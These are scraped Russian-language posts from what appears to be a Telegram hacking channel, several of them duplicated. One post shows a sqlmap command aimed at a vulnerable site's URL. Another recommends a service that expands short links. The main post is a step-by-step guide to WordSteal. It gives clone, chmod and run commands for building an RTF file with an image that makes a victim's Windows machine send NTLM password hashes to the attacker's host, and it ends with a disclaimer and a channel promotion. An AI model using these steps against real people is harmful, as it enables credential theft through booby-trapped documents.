Использование▫️
python2 sqlmap.py -u <url уязвимого веб-сайта>
Подробный список команд📌 https://github.com/sqlmapproject/sqlmap/wiki/Usage
❗️Помни, вся информация предоставлена исключительно в ознакомительных целях.
#хакинг
Как расшифровать короткую ссылку
Довольно часто бывают ситуации, когда ссылки на какой-нибудь сайт получаются очень уж длинными, и потому неудобными для того, чтобы делиться ими с кем-то. Для таких ситуаций и были созданы короткие ссылки.
Но, как и многое другое в этом мире, этот инструмент имеет и «темную сторону» сторону. Дело в том, что переходя по короткой ссылке, человек понятния не имеет, куда, собственно, он переходит. А увидит он это только после совершения самого перехода.
В итоге, кликая по короткой ссылке, можно запросто оказаться на каком-нибудь зловредном ресурсе, где от вирусов и прочей малвари не будет отбоя.
Чтобы избежать неприятных ситуаций, описанных выше, воспользуемся ресурсом, который дешифрует ссылки. Кстати, ресурс позволяет «за одно» проверить ссылку на вирусы и показывает цепочку перенаправлений.
👺А вот и небольшой тест работоспособности ресурса. Куда приведет эта ссылка? 👉 shorturl.at/yzGQR
📌 https://longurl.info/
#хитрости #безопасность
Довольно часто бывают ситуации, когда ссылки на какой-нибудь сайт получаются очень уж длинными, и потому неудобными для того, чтобы делиться ими с кем-то. Для таких ситуаций и были созданы короткие ссылки.
Но, как и многое другое в этом мире, этот инструмент имеет и «темную сторону» сторону. Дело в том, что переходя по короткой ссылке, человек понятния не имеет, куда, собственно, он переходит. А увидит он это только после совершения самого перехода.
В итоге, кликая по короткой ссылке, можно запросто оказаться на каком-нибудь зловредном ресурсе, где от вирусов и прочей малвари не будет отбоя.
Чтобы избежать неприятных ситуаций, описанных выше, воспользуемся ресурсом, который дешифрует ссылки. Кстати, ресурс позволяет «за одно» проверить ссылку на вирусы и показывает цепочку перенаправлений.
👺А вот и небольшой тест работоспособности ресурса. Куда приведет эта ссылка? 👉 shorturl.at/yzGQR
📌 https://longurl.info/
#хитрости #безопасность
Скачал книгу? Твои пароли уже у хакеров
Возможность интегрировать в RTF файл тот же стиллер поставила под угрозу пользователей, качающих электронные книги в этом формате. Поскольку RTF - это язык разметки текста, возможностей его синтаксиса хватает для реализации подкачки внешних файлов.
Утилита WordSteal может наглядно продемонстрировать работу уязвимости RTF. Она с легкостью вошьет стиллер в RTF файл с картинкой. Когда условная жертва откроет этот файл, хакер удаленно получит NTLM хеши паролей Windows. Давайте посмотрим, как это работает на примере изображения:
Настройка
Устанавливаем Kali Linux
Для начала установим репозиторий и обновим права доступа
◽
◽
Использование
Для создания RTF файла со стиллером нам понадобится только картинка.
◽
После выполнения этой команды в директории появится RTF файл с полезной нагрузкой. Чтобы её испытать, нужно не закрывая окно терминала открыть данный файл на Windows. В терминал придут хеши паролей.
❗️Чтобы за «бесплатные» книги не пришлось дорого расплачиваться, скачивать их стоит из Архива хакера - @hackrhive
#хакинг #безопасность
Возможность интегрировать в RTF файл тот же стиллер поставила под угрозу пользователей, качающих электронные книги в этом формате. Поскольку RTF - это язык разметки текста, возможностей его синтаксиса хватает для реализации подкачки внешних файлов.
Утилита WordSteal может наглядно продемонстрировать работу уязвимости RTF. Она с легкостью вошьет стиллер в RTF файл с картинкой. Когда условная жертва откроет этот файл, хакер удаленно получит NTLM хеши паролей Windows. Давайте посмотрим, как это работает на примере изображения:
Настройка
Устанавливаем Kali Linux
Для начала установим репозиторий и обновим права доступа
◽
git clone https://github.com/0x09AL/WordSteal.git
◽
chmod +x main.py
Использование
Для создания RTF файла со стиллером нам понадобится только картинка.
◽
python main.py <ip хоста> <название картинки> 1
После выполнения этой команды в директории появится RTF файл с полезной нагрузкой. Чтобы её испытать, нужно не закрывая окно терминала открыть данный файл на Windows. В терминал придут хеши паролей.
❗️Чтобы за «бесплатные» книги не пришлось дорого расплачиваться, скачивать их стоит из Архива хакера - @hackrhive
#хакинг #безопасность